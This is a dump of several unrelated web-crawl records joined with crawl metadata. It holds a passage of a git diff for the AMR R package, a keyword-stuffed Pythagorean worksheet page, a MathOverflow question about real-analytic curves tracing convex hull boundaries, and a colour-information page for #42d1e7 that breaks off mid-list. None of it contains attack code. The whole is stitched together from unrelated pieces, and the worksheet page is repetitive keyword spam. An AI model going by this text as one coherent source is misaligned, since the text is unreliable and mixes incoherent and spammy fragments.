deleted, update reference` ` set_mo_source(\"\")` ` }` ` return(NULL)` ` }` ` ` ` if (!file.exists(path.expand(\"~/mo_source.rds\"))) {` ` options(mo_source = NULL)` ` options(mo_source_timestamp = NULL)` ` message_(\"Removed references to deleted mo_source file (see ?mo_source)\")` ` return(NULL)` ` if (is.null(mo_env\\$mo_source)) {` ` mo_env\\$mo_source <- readRDS(path.expand(destination))` ` }` ` ` ` old_time <- as.POSIXct(getOption(\"mo_source_timestamp\"))` ` new_time <- as.POSIXct(as.character(file.info(getOption(\"mo_source\", \"\"))\\$mtime))` ` ` ` if (is.na(new_time)) {` ` # source file was deleted, remove reference too` ` set_mo_source(\"\")` ` return(NULL)` ` }` ` if (interactive() && new_time != old_time) {` ` # set updated source` ` set_mo_source(getOption(\"mo_source\"))` ` old_time <- attributes(mo_env\\$mo_source)\\$mo_source_timestamp` ` new_time <- file.mtime(attributes(mo_env\\$mo_source)\\$mo_source_location)` ` if (interactive() && !identical(old_time, new_time)) {` ` # source file was updated, also update reference` ` set_mo_source(attributes(mo_env\\$mo_source)\\$mo_source_location)` ` }` ` file_location <- path.expand(\"~/mo_source.rds\")` ` readRDS(file_location)` ` mo_env\\$mo_source` `}` ``` ``` `mo_source_isvalid <- function(x, refer_to_name = \"`reference_df`\", stop_on_error = TRUE) {` `@ -242,7 +250,7 @@ mo_source_isvalid <- function(x, refer_to_name = \"`reference_df`\", stop_on_error` ` if (paste(deparse(substitute(x)), collapse = \"\") == \"get_mo_source()\") {` ` return(TRUE)` ` }` ` if (identical(x, get_mo_source())) {` ` if (is.null(mo_env\\$mo_source) && (identical(x, get_mo_source()))) {` ` return(TRUE)` ` }` ` if (is.null(x)) {`\n\n#### 4 R/proportion.R Unescape Escape View File\n\n `@ -34,9 +34,9 @@` `#' @param as_percent a logical to indicate whether the output must be returned as a hundred fold with % sign (a character). A value of `0.123456` will then be returned as `\"12.3%\"`.` `#' @param only_all_tested (for combination therapies, i.e. using more than one variable for `...`): a logical to indicate that isolates must be tested for all antibiotics, see section *Combination therapy* below` `#' @param data a [data.frame] containing columns with class [`rsi`] (see [as.rsi()])` `#' @param translate_ab a column name of the [antibiotics] data set to translate the antibiotic abbreviations to, using [ab_property()]. Use a value ` `#' @param translate_ab a column name of the [antibiotics] data set to translate the antibiotic abbreviations to, using [ab_property()]` `#' @inheritParams ab_property` `#' @param combine_SI a logical to indicate whether all values of S and I must be merged into one, so the output only consists of S+I vs. R (susceptible vs. resistant). This used to be the parameter `combine_IR`, but this now follows the redefinition by EUCAST about the interpretion of I (increased exposure) in 2019, see section 'Interpretation of S, I and R' below. Default is `TRUE`.` `#' @param combine_SI a logical to indicate whether all values of S and I must be merged into one, so the output only consists of S+I vs. R (susceptible vs. resistant). This used to be the parameter `combine_IR`, but this now follows the redefinition by EUCAST about the interpretation of I (increased exposure) in 2019, see section 'Interpretation of S, I and R' below. Default is `TRUE`.` `#' @param combine_IR a logical to indicate whether all values of I and R must be merged into one, so the output only consists of S vs. I+R (susceptible vs. non-susceptible). This is outdated, see parameter `combine_SI`.` `#' @inheritSection as.rsi Interpretation of R and S/I` `#' @details`\n\n#### 2 R/resistance_predict.R Unescape Escape View File\n\n `@ -34,7 +34,7 @@` `#' @param year_every unit of sequence between lowest year found in the data and `year_max`` `#' @param minimum minimal amount of available isolates per year to include. Years containing less observations will be estimated by the model.` `#' @param model the statistical model of choice. This could be a generalised linear regression model with binomial distribution (i.e. using `glm(..., family = binomial)``, assuming that a period of zero resistance was followed by a period of increasing resistance leading slowly to more and more resistance. See Details for all valid options.` `#' @param I_as_S a logical to indicate whether values `I` should be treated as `S` (will otherwise be treated as `R`). The default, `TRUE`, follows the redefinition by EUCAST about the interpretion of I (increased exposure) in 2019, see section *Interpretation of S, I and R* below. ` `#' @param I_as_S a logical to indicate whether values `\"I\"` should be treated as `\"S\"` (will otherwise be treated as `\"R\"`). The default, `TRUE`, follows the redefinition by EUCAST about the interpretation of I (increased exposure) in 2019, see section *Interpretation of S, I and R* below. ` `#' @param preserve_measurements a logical to indicate whether predictions of years that are actually available in the data should be overwritten by the original data. The standard errors of those years will be `NA`.` `#' @param info a logical to indicate whether textual analysis should be printed with the name and [summary()] of the statistical model.` `#' @param main title of the plot`\n\n#### 46 R/rsi.R Unescape Escape View File\n\n `@ -481,7 +481,7 @@ as.rsi.data.frame <- function(x,` ` meet_criteria(conserve_capped_values, allow_class = \"logical\", has_length = 1)` ` meet_criteria(add_intrinsic_resistance, allow_class = \"logical\", has_length = 1)` ` meet_criteria(reference_data, allow_class = \"data.frame\")` ` ` ``` ``` ` for (i in seq_len(ncol(x))) {` ` # don't keep factors` ` if (is.factor(x[, i, drop = TRUE])) {` `@ -494,7 +494,7 @@ as.rsi.data.frame <- function(x,` ` if (is.null(col_mo)) {` ` col_mo <- search_type_in_df(x = x, type = \"mo\", info = FALSE)` ` }` ` ` ``` ``` ` # -- UTIs` ` col_uti <- uti` ` if (is.null(col_uti)) {` `@ -535,12 +535,13 @@ as.rsi.data.frame <- function(x,` ` uti <- FALSE` ` }` ` }` ` ` ``` ``` ` i <- 0` ` sel <- colnames(pm_select(x, ...))` ` if (!is.null(col_mo)) {` ` sel <- sel[sel != col_mo]` ` }` ``` ``` ` ab_cols <- colnames(x)[sapply(x, function(y) {` ` i <<- i + 1` ` check <- is.mic(y) | is.disk(y)` `@ -563,17 +564,16 @@ as.rsi.data.frame <- function(x,` ` return(FALSE)` ` }` ` })]` ` ` ``` ``` ` stop_if(length(ab_cols) == 0,` ` \"no columns with MIC values, disk zones or antibiotic column names found in this data set. Use as.mic() or as.disk() to transform antimicrobial columns.\")` ` # set type per column` ` types <- character(length(ab_cols))` ` types[sapply(x[, ab_cols], is.disk)] <- \"disk\"` ` types[types == \"\" & sapply(x[, ab_cols], all_valid_disks)] <- \"disk\"` ` types[sapply(x[, ab_cols], is.mic)] <- \"mic\"` ` types[types == \"\" & sapply(x[, ab_cols], all_valid_mics)] <- \"mic\"` ` types[types == \"\" & !sapply(x[, ab_cols], is.rsi)] <- \"rsi\"` ` ` ` types[sapply(x[, ab_cols, drop = FALSE], is.disk)] <- \"disk\"` ` types[types == \"\" & sapply(x[, ab_cols, drop = FALSE], all_valid_disks)] <- \"disk\"` ` types[sapply(x[, ab_cols, drop = FALSE], is.mic)] <- \"mic\"` ` types[types == \"\" & sapply(x[, ab_cols, drop = FALSE], all_valid_mics)] <- \"mic\"` ` types[types == \"\" & !sapply(x[, ab_cols, drop = FALSE], is.rsi)] <- \"rsi\"` ` if (any(types %in% c(\"mic\", \"disk\"), na.rm = TRUE)) {` ` # now we need an mo column` ` stop_if(is.null(col_mo), \"`col_mo` must be set\")` `@ -582,9 +582,9 @@ as.rsi.data.frame <- function(x,` ` col_mo <- search_type_in_df(x = x, type = \"mo\")` ` }` ` }` ` ` ``` ``` ` x_mo <- as.mo(x %pm>% pm_pull(col_mo))` ` ` ``` ``` ` for (i in seq_len(length(ab_cols))) {` ` if (types[i] == \"mic\") {` ` x[, ab_cols[i]] <- as.rsi(x = x %pm>% ` `@ -845,19 +845,22 @@ freq.rsi <- function(x, ...) {` ` }))[1L]` ` }` ` ab <- suppressMessages(suppressWarnings(as.ab(x_name)))` ` freq.default <- import_fn(\"freq.default\", \"cleaner\", error_on_fail = FALSE)` ` digits <- list(...)\\$digits` ` if (is.null(digits)) {` ` digits <- 2` ` }` ` if (!is.na(ab)) {` ` freq.default(x = x, ...,` ` .add_header = list(Drug = paste0(ab_name(ab, language = NULL), \" (\", ab, \", \", ab_atc(ab), \")\"),` ` `Drug group` = ab_group(ab, language = NULL),` ` `%SI` = percentage(susceptibility(x, minimum = 0, as_percent = FALSE), digits = digits)))` ` cleaner::freq.default(x = x, ...,` ` .add_header = list(` ` Drug = paste0(ab_name(ab, language = NULL), \" (\", ab, \", \", ab_atc(ab), \")\"),` ` `Drug group` = ab_group(ab, language = NULL),` ` `%SI` = percentage(susceptibility(x, minimum = 0, as_percent = FALSE),` ` digits = digits)))` ` } else {` ` freq.default(x = x, ...,` ` .add_header = list(`%SI` = percentage(susceptibility(x, minimum = 0, as_percent = FALSE), digits = digits)))` ` cleaner::freq.default(x = x, ...,` ` .add_header = list(` ` `%SI` = percentage(susceptibility(x, minimum = 0, as_percent = FALSE),` ` digits = digits)))` ` }` `}` ``` ``` `@ -892,8 +895,7 @@ get_skimmers.rsi <- function(column) {` ` }` ` }` ` ` ` sfl <- import_fn(\"sfl\", \"skimr\", error_on_fail = FALSE)` ` sfl(` ` skimr::sfl(` ` skim_type = \"rsi\",` ` ab_name = name_call,` ` count_R = count_R,` `@ -916,7 +918,7 @@ print.rsi <- function(x, ...) {` `#' @method droplevels rsi` `#' @export` `#' @noRd` `droplevels.rsi <- function(x, exclude = if (anyNA(levels(x))) NULL else NA, ...) {` `droplevels.rsi <- function(x, exclude = if (any(is.na(levels(x)))) NULL else NA, ...) {` ` x <- droplevels.factor(x, exclude = exclude, ...)` ` class(x) <- c(\"rsi\", \"ordered\", \"factor\")` ` x`\n\n#### 6 R/rsi_calc.R Unescape Escape View File\n\n `@ -96,7 +96,11 @@ rsi_calc <- function(...,` ` ` ` if (is.null(x)) {` ` warning_(\"argument is NULL (check if columns exist): returning NA\", call = FALSE)` ` return(NA)` ` if (as_percent == TRUE) {` ` return(NA_character_)` ` } else {` ` return(NA_real_)` ` }` ` }` ` ` ` print_warning <- FALSE`\n\n#### 4 R/translate.R Unescape Escape View File\n\n `@ -27,7 +27,7 @@` `#'` `#' For language-dependent output of AMR functions, like [mo_name()], [mo_gramstain()], [mo_type()] and [ab_name()].` `#' @inheritSection lifecycle Stable lifecycle` `#' @details Strings will be translated to foreign languages if they are defined in a local translation file. Additions to this file can be suggested at our repository. The file can be found here: . This file will be read by all functions where a translated output can be desired, like all [mo_property()] functions ([mo_name()], [mo_gramstain()], [mo_type()], etc.) and [ab_property()] functions ([ab_name()], [ab_group()] etc.). ` `#' @details Strings will be translated to foreign languages if they are defined in a local translation file. Additions to this file can be suggested at our repository. The file can be found here: . This file will be read by all functions where a translated output can be desired, like all [`mo_*`][mo_property()] functions (such as [mo_name()], [mo_gramstain()], [mo_type()], etc.) and [`ab_*`][ab_property()] functions (such as [ab_name()], [ab_group()], etc.). ` `#'` `#' Currently supported languages are: `r paste(sort(gsub(\";.*\", \"\", ISOcodes::ISO_639_2[which(ISOcodes::ISO_639_2\\$Alpha_2 %in% LANGUAGES_SUPPORTED), \"Name\"])), collapse = \", \")`. Please note that currently not all these languages have translations available for all antimicrobial agents and colloquial microorganism names. ` `#'` `@ -96,7 +96,7 @@ get_locale <- function() {` ` }` ` }` ` ` ` coerce_language_setting(Sys.getlocale())` ` coerce_language_setting(Sys.getlocale(\"LC_COLLATE\"))` `}` ``` ``` `coerce_language_setting <- function(lang) {`\n\n#### 1 R/zzz.R Unescape Escape View File\n\n `@ -24,6 +24,7 @@` `# ==================================================================== #` ``` ``` `.onLoad <- function(libname, pkgname) {` ` ` ` assign(x = \"AB_lookup\",` ` value = create_AB_lookup(),` ` envir = asNamespace(\"AMR\"))`\n\n#### 4 data-raw/reproduction_of_poorman.R Unescape Escape View File\n\n `@ -75,3 +75,7 @@ contents <- gsub(\"pm_distinct <- function(.data, ..., .keep_all = FALSE)\", \"pm_d` `contents <- contents[!grepl(\"summarize\", contents)]` ``` ``` `writeLines(contents, \"R/aa_helper_pm_functions.R\")` ``` ``` `# after this, comment out:` `# pm_left_join() since we use a faster version` `# pm_group_split() since we don't use it and it relies on R 3.5.0 for the use of ...length(), which is hard to support with C++ code`\n\n#### 2 docs/404.html Unescape Escape View File\n\n `@ -81,7 +81,7 @@` ` ` ` ` ` AMR (for R)` ` 1.4.0.9040` ` 1.4.0.9041` ` ` ` ` ``` ```\n\n#### 2 docs/LICENSE-text.html Unescape Escape View File\n\n `@ -81,7 +81,7 @@` ` ` ` ` ` AMR (for R)` ` 1.4.0.9040` ` 1.4.0.9041` ` ` ` ` ``` ```\n\n#### 40 docs/articles/datasets.html Unescape Escape View File\n\n `@ -39,7 +39,7 @@` ` ` ` ` ` AMR (for R)` ` 1.4.0.9032` ` 1.4.0.9041` ` ` ` ` ``` ``` `@ -47,14 +47,14 @@` `" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7687352,"math_prob":0.813387,"size":26295,"snap":"2022-40-2023-06","text_gpt3_token_len":6669,"char_repetition_ratio":0.1239968,"word_repetition_ratio":0.48174417,"special_character_ratio":0.25476328,"punctuation_ratio":0.11816578,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9606709,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-29T21:42:56Z\",\"WARC-Record-ID\":\"<urn:uuid:622e1530-d2ac-4e39-826e-c421eb4bd973>\",\"Content-Length\":\"1049118\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a6bbee31-73b0-4e24-be6a-34facd057379>\",\"WARC-Concurrent-To\":\"<urn:uuid:3bd11219-0a5d-42e4-aac8-f19967955186>\",\"WARC-IP-Address\":\"129.125.2.123\",\"WARC-Target-URI\":\"https://git.webhosting.rug.nl/P281424/AMR/commit/81af41da3a0ed85a02fe70cba0ca9b0531f0676d\",\"WARC-Payload-Digest\":\"sha1:ZQP5INU6G3BEUQRRFBWEN3NRQZXIVD77\",\"WARC-Block-Digest\":\"sha1:2EUCRXTK4TK6JZPS5T66TBUUCHKPCTZ6\",\"WARC-Truncated\":\"length\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499768.15_warc_CC-MAIN-20230129211612-20230130001612-00790.warc.gz\"}"}
http://karenlynndixon.info/easy-pythagorean-theorem-worksheet/easy-pythagorean-theorem-worksheet-theorem-proof-students-are-asked-to-prove-the-theorem-using-similar-triangle-easy-pythagorean-theorem-worksheet-pdf/
[ "Easy Pythagorean Theorem Worksheet Theorem Proof Students Are Asked To Prove The Theorem Using Similar Triangle Easy Pythagorean Theorem Worksheet Pdf", null, "easy pythagorean theorem worksheet theorem proof students are asked to prove the theorem using similar triangle easy pythagorean theorem worksheet pdf.\n\ntheorem worksheet with answers word easy pythagorean pdf , trigonometric identities and examples with worksheets easy pythagorean theorem worksheet pdf,theorem proof students are asked to prove the easy pythagorean worksheet pdf,theorem word problems worksheet with answers picture easy pythagorean pdf,theorem worksheet with answers word easy pythagorean pdf ,theorem finding a shorter side worksheet with answers easy pythagorean pdf ,easy pythagorean theorem worksheet pdf ,maths revision exam paper practice theorem easy pythagorean worksheet pdf,theorem proof students are asked to prove the easy pythagorean worksheet pdf, easy pythagorean theorem worksheet pdf." ]
[ null, "http://karenlynndixon.info/wp-content/uploads/2019/05/easy-pythagorean-theorem-worksheet-theorem-proof-students-are-asked-to-prove-the-theorem-using-similar-triangle-easy-pythagorean-theorem-worksheet-pdf.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8584276,"math_prob":0.9629263,"size":820,"snap":"2019-26-2019-30","text_gpt3_token_len":151,"char_repetition_ratio":0.26715687,"word_repetition_ratio":0.254717,"special_character_ratio":0.14634146,"punctuation_ratio":0.088709675,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":1.0000081,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-17T03:35:49Z\",\"WARC-Record-ID\":\"<urn:uuid:c90c2f2c-0b6e-4356-bdd1-f34074e33f1e>\",\"Content-Length\":\"87806\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c59e76db-bf49-4278-9f90-038088b06fe6>\",\"WARC-Concurrent-To\":\"<urn:uuid:1a6b4764-4b7a-4d64-93b2-05a8cc794f86>\",\"WARC-IP-Address\":\"104.18.59.36\",\"WARC-Target-URI\":\"http://karenlynndixon.info/easy-pythagorean-theorem-worksheet/easy-pythagorean-theorem-worksheet-theorem-proof-students-are-asked-to-prove-the-theorem-using-similar-triangle-easy-pythagorean-theorem-worksheet-pdf/\",\"WARC-Payload-Digest\":\"sha1:5BRRTMH7F5H3JQJP75S3VVOT55WFGLG4\",\"WARC-Block-Digest\":\"sha1:GLIRXLDPMXS3VROUNZD42TT3ZX7LWRS2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998369.29_warc_CC-MAIN-20190617022938-20190617044938-00456.warc.gz\"}"}
https://mathoverflow.net/questions/355946/i-found-a-probably-new-family-of-real-analytic-closed-bezier-like-curves-is-i
[ "# I found a (probably new) family of real analytic closed Bezier-like curves; is it publishable?\n\nGiven $$n$$ distinct points $$\\mathbf{x} = (\\mathbf{x}_1, \\ldots, \\mathbf{x}_n)$$ in the plane $$\\mathbb{R}^2$$, I associate a real analytic map:\n\n$$f_{\\mathbf{x}}: S^1 \\to \\mathbb{R}^2$$\n\nwith the following properties. If $$C_n(\\mathbb{R^2})$$ is the configuration space of $$n$$ distinct points in $$\\mathbb{R}^2$$, then each there is a real analytic map $$f: C_n(\\mathbb{R}^2) \\times S^1 \\to \\mathbb{R}^2$$ such that $f_{\\mathbf{x}}(-) = f(\\mathbf{x},-).$$The image of $$f_{\\mathbf{x}}$$ is in the convex hull of $$\\mathbf{x}$$. Also, if $$\\mathbf{x}'$$ is a permutation of the points in $$\\mathbf{x}$$, then $$f_{\\mathbf{x}'} = f_{\\mathbf{x}}$$. Finally, if you apply a Euclidean transformation to the configuration $$\\mathbf{x}$$, then the image of the curve $$f_{\\mathbf{x}}$$ gets transformed by the same Euclidean transformation. Here are some plots.", null, "", null, "", null, "The points in $$\\mathbf{x}$$ are shown in red, and the corresponding curve is shown in blue. My question is, is there any interest in such Bezier-like curves? Can I publish them somewhere? I am not familiar with the area. Could someone possibly suggest some journal(s) by any chance? Actually, I found originally a related family, where given $$n$$ distinct points $$\\mathbf{x} = (\\mathbf{x}_1,\\ldots,\\mathbf{x}_n)$$ in $$\\mathbb{R}^3$$, I associate a real analytic map: $$f_{\\mathbf{x}}: S^2 \\to \\mathbb{R}^3,$$ with similar properties as the first family of maps. My work does not extend further to higher dimension though. Any comments and/or suggestions are welcome. Edit 1: after discussing with @DanieleTampieri, and looking at the third figure, it does seems like my maps could possibly be used in boundary detection problems possibly. It is interesting that a single formula seems to accomplish what is usually done algorithmically. Edit 2: following one of @JochenGlueck's comments, I did the following experiment. I started with a configuration of $$4$$ points and plotted the corresponding curve. Then I added $$6$$ points at random inside the convex hull of the initial $$4$$ points, and plotted the corresponding curve. The new curve looks like it passes through the original $$4$$ points now, interestingly. Here are the corresponding two plots. Edit 3: I wrote a GUI interface using the Python library Tkinter. Now I can place the points on a canvas, press a button and see the resulting curve. This will enable me to experiment further with these curves. After consulting with a few people, I think this may fit in a journal of Computer Graphics perhaps. It may not be appropriate in a journal of Approximation theory or Numerical Analysis I think, as it does not really contain results, as of now. In any case, I will let things stew a bit more in my brain before writing things up. Thank you all. Edit 4: I saw how to generalize my maps in two different directions: as a sequence of maps, and in higher dimension. More specifically, I have defined, for each positive integer $$m$$, a real analytic map: $$f_m: C_n(\\mathbb{R}^d) \\times S^{d-1} \\to \\mathbb{R}^d,$$ such that, given $$\\mathbf{x} \\in C_n(\\mathbb{R}^d)$$ (where $$C_n(\\mathbb{R}^d)$$ denotes the configuration space of $$n$$ distinct points in $$\\mathbb{R}^d$$), the map $$f_m(\\mathbf{x},-)$$ maps the $$d-1$$ dimensional sphere to a good approximation of the boundary of the convex hull of $$\\mathbf{x}$$. In the cases I considered, it seems that small values of $$m$$ suffice in practice (I mostly experimented in 2d and a little bit in 3d). Here is the plot of the images of some sample points on the sphere, for the case where $$\\mathbf{x}$$ is the configuration of the $$4$$ vertices of a regular tetrahedron. I used $$m=3$$. I also include a 2d example, with $$m=3$$ (my previous map corresponds to $$m=1$$). Edit 5: I uploaded a short note on arXiv. In case someone is interested in knowing how my maps are defined: Rational Maps and Boundaries of Convex Hulls, arXiv:2004.04538. I submitted this short note to a journal for review (sorry for all the updates). Edit 6, UPDATE: Peter Olver found a counterexample to my conjecture in the arXiv article in Edit 5, so I will withdraw it, BUT this led to a fruitful collaboration where, after modifying the definition of the maps, we were actually able to prove convergence in the preprint Continuous Maps from Spheres Converging to Boundaries of Convex Hulls, arXiv:2007.03011. However, the maps are only piecewise rational, yet they are continuous. I am curious to know what people think of our preprint, for the ones who are interested enough to read it! • From my point of view, your algorithm can be interesting in character recognition and tracing a bitmap (transforming a bitmap into a smooth, scalable image). I don't know if your result is new nor can be classified as \"prior art\", though any journal in approximation theory is potentially interested. – Daniele Tampieri Mar 28 '20 at 13:23 • @DanieleTampieri, thank you for your comments. I got a few upvotes then a few downvotes. I wish more people would take the time to write comments. I do not work in approximation theory, so constructive criticism would be welcome too. – Malkoun Mar 28 '20 at 13:30 • Bezier curves also have applications in shape optimization problems. See Haslinger, J., & Mäkinen, R. A. (2003). Introduction to shape optimization: theory, approximation, and computation. Society for Industrial and Applied Mathematics. I don't know whether it will be useful for you or not. – SMA.D Mar 28 '20 at 22:17 • A remark about the properties listed in the paragraph before the plots: Due to the plots I'm under the impression that your map has, in addition, some kind of \"maxmimality\" property which seems to be important from a geometric point of view and which you have not listed: Say, if$\\overline{\\mathbf{x}}\\in\\mathbb{R}^2$denotes the arithmetic mean of$\\mathbf{x}$, then e.g.$\\tilde f_{\\mathbf{x}}(s) = f_{\\mathbf{x}}(s)/2+\\overline{\\mathbf{x}}/2$also has all the properties listed before the plots, but is \"contracted\" towards$\\overline{\\mathbf{x}}$- which your plots don't seem to be. – Jochen Glueck Mar 28 '20 at 23:00 • @JochenGlueck, I did the experiment you suggested. The new curve seems to pass through the original points in$\\mathbf{x}$(consisting of$4$points) after adding$6$random points inside the convex hull of the original$\\mathbf{x}\\$. – Malkoun Mar 29 '20 at 12:20" ]
[ null, "https://i.stack.imgur.com/eveXB.png", null, "https://i.stack.imgur.com/78zCM.png", null, "https://i.stack.imgur.com/RmqQn.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88986343,"math_prob":0.9958549,"size":4475,"snap":"2021-31-2021-39","text_gpt3_token_len":1200,"char_repetition_ratio":0.13688213,"word_repetition_ratio":0.025352113,"special_character_ratio":0.26256984,"punctuation_ratio":0.11836283,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9997142,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,3,null,3,null,3,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-03T10:37:04Z\",\"WARC-Record-ID\":\"<urn:uuid:7aa09bf1-cf4b-4b88-bb1c-b6b886a0cf4b>\",\"Content-Length\":\"137078\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bacb774b-6450-4ee2-8074-f9cb921b4d23>\",\"WARC-Concurrent-To\":\"<urn:uuid:f99e4fe0-57d5-470a-93de-5c3009d6ab56>\",\"WARC-IP-Address\":\"151.101.129.69\",\"WARC-Target-URI\":\"https://mathoverflow.net/questions/355946/i-found-a-probably-new-family-of-real-analytic-closed-bezier-like-curves-is-i\",\"WARC-Payload-Digest\":\"sha1:IS4PIMP4DIJMFYWG4Z77VDCNUWKT5ELA\",\"WARC-Block-Digest\":\"sha1:7QR5TGYKIJCEGE26XGNAA5TNWUTSAA5P\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154457.66_warc_CC-MAIN-20210803092648-20210803122648-00145.warc.gz\"}"}
https://www.colorhexa.com/42d1e7
[ "# #42d1e7 Color Information\n\nIn a RGB color space, hex #42d1e7 is composed of 25.9% red, 82% green and 90.6% blue. Whereas in a CMYK color space, it is composed of 71.4% cyan, 9.5% magenta, 0% yellow and 9.4% black. It has a hue angle of 188 degrees, a saturation of 77.5% and a lightness of 58.2%. #42d1e7 color hex could be obtained by blending #84ffff with #00a3cf. Closest websafe color is: #33ccff.\n\n• R 26\n• G 82\n• B 91\nRGB color chart\n• C 71\n• M 10\n• Y 0\n• K 9\nCMYK color chart\n\n#42d1e7 color description : Bright cyan.\n\n# #42d1e7 Color Conversion\n\nThe hexadecimal color #42d1e7 has RGB values of R:66, G:209, B:231 and CMYK values of C:0.71, M:0.1, Y:0, K:0.09. Its decimal value is 4379111.\n\nHex triplet RGB Decimal 42d1e7 `#42d1e7` 66, 209, 231 `rgb(66,209,231)` 25.9, 82, 90.6 `rgb(25.9%,82%,90.6%)` 71, 10, 0, 9 188°, 77.5, 58.2 `hsl(188,77.5%,58.2%)` 188°, 71.4, 90.6 33ccff `#33ccff`\nCIE-LAB 77.594, -30.399, -21.81 39.467, 52.525, 83.655 0.225, 0.299, 52.525 77.594, 37.414, 215.658 77.594, -51.885, -30.202 72.474, -29.625, -17.705 01000010, 11010001, 11100111\n\n# Color Schemes with #42d1e7\n\n• #42d1e7\n``#42d1e7` `rgb(66,209,231)``\n• #e75842\n``#e75842` `rgb(231,88,66)``\nComplementary Color\n• #42e7ab\n``#42e7ab` `rgb(66,231,171)``\n• #42d1e7\n``#42d1e7` `rgb(66,209,231)``\n• #427fe7\n``#427fe7` `rgb(66,127,231)``\nAnalogous Color\n• #e7ab42\n``#e7ab42` `rgb(231,171,66)``\n• #42d1e7\n``#42d1e7` `rgb(66,209,231)``\n• #e7427f\n``#e7427f` `rgb(231,66,127)``\nSplit Complementary Color\n• #d1e742\n``#d1e742` `rgb(209,231,66)``\n• #42d1e7\n``#42d1e7` `rgb(66,209,231)``\n• #e742d1\n``#e742d1` `rgb(231,66,209)``\n• #42e758\n``#42e758` `rgb(66,231,88)``\n• #42d1e7\n``#42d1e7` `rgb(66,209,231)``\n• #e742d1\n``#e742d1` `rgb(231,66,209)``\n• #e75842\n``#e75842` `rgb(231,88,66)``\n``#19adc4` `rgb(25,173,196)``\n• #1cc1da\n``#1cc1da` `rgb(28,193,218)``\n• #2bcbe4\n``#2bcbe4` `rgb(43,203,228)``\n• #42d1e7\n``#42d1e7` `rgb(66,209,231)``\n• #59d7ea\n``#59d7ea` `rgb(89,215,234)``\n• #6fdced\n``#6fdced` `rgb(111,220,237)``\n• #86e2f0\n``#86e2f0` `rgb(134,226,240)``\nMonochromatic Color\n\n# Alternatives to #42d1e7\n\nBelow, you can see some colors close to #42d1e7. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #42e7d4\n``#42e7d4` `rgb(66,231,212)``\n• #42e7e2\n``#42e7e2` `rgb(66,231,226)``\n• #42dfe7\n``#42dfe7` `rgb(66,223,231)``\n• #42d1e7\n``#42d1e7` `rgb(66,209,231)``\n• #42c3e7\n``#42c3e7` `rgb(66,195,231)``\n• #42b6e7\n``#42b6e7` `rgb(66,182,231)``\n• #42a8e7\n``#42a8e7` `rgb(66,168,231)``\nSimilar Colors\n\n# #42d1e7 Preview\n\nThis text has a font color of #42d1e7.\n\n``<span style=\"color:#42d1e7;\">Text here</span>``\n#42d1e7 background color\n\nThis paragraph has a background color of #42d1e7.\n\n``<p style=\"background-color:#42d1e7;\">Content here</p>``\n#42d1e7 border color\n\nThis element has a border color of #42d1e7.\n\n``<div style=\"border:1px solid #42d1e7;\">Content here</div>``\nCSS codes\n``.text {color:#42d1e7;}``\n``.background {background-color:#42d1e7;}``\n``.border {border:1px solid #42d1e7;}``\n\n# Shades and Tints of #42d1e7\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #000202 is the darkest color, while #f0fbfd is the lightest one.\n\n• #000202\n``#000202` `rgb(0,2,2)``\n• #031214\n``#031214` `rgb(3,18,20)``\n• #052125\n``#052125` `rgb(5,33,37)``\n• #073037\n``#073037` `rgb(7,48,55)``\n• #094048\n``#094048` `rgb(9,64,72)``\n• #0b4f59\n``#0b4f59` `rgb(11,79,89)``\n• #0e5e6b\n``#0e5e6b` `rgb(14,94,107)``\n• #106e7c\n``#106e7c` `rgb(16,110,124)``\n• #127d8e\n``#127d8e` `rgb(18,125,142)``\n• #148d9f\n``#148d9f` `rgb(20,141,159)``\n• #169cb1\n``#169cb1` `rgb(22,156,177)``\n• #19abc2\n``#19abc2` `rgb(25,171,194)``\n• #1bbbd3\n``#1bbbd3` `rgb(27,187,211)``\n• #1fc9e3\n``#1fc9e3` `rgb(31,201,227)``\n• #31cde5\n``#31cde5` `rgb(49,205,229)``\n• #42d1e7\n``#42d1e7` `rgb(66,209,231)``\n• #53d5e9\n``#53d5e9` `rgb(83,213,233)``\n• #65d9eb\n``#65d9eb` `rgb(101,217,235)``\n• #76deee\n``#76deee` `rgb(118,222,238)``\n• #88e2f0\n``#88e2f0` `rgb(136,226,240)``\n• #99e6f2\n``#99e6f2` `rgb(153,230,242)``\n• #aaeaf4\n``#aaeaf4` `rgb(170,234,244)``\n• #bceff6\n``#bceff6` `rgb(188,239,246)``\n• #cdf3f9\n``#cdf3f9` `rgb(205,243,249)``\n• #dff7fb\n``#dff7fb` `rgb(223,247,251)``\n• #f0fbfd\n``#f0fbfd` `rgb(240,251,253)``\nTint Color Variation\n\n# Tones of #42d1e7\n\nA tone is produced by adding gray to any pure hue. In this case, #949595 is the less saturated color, while #32ddf7 is the most saturated one.\n\n• #949595\n``#949595` `rgb(148,149,149)``\n• #8c9b9d\n``#8c9b9d` `rgb(140,155,157)``\n• #84a1a5\n``#84a1a5` `rgb(132,161,165)``\n• 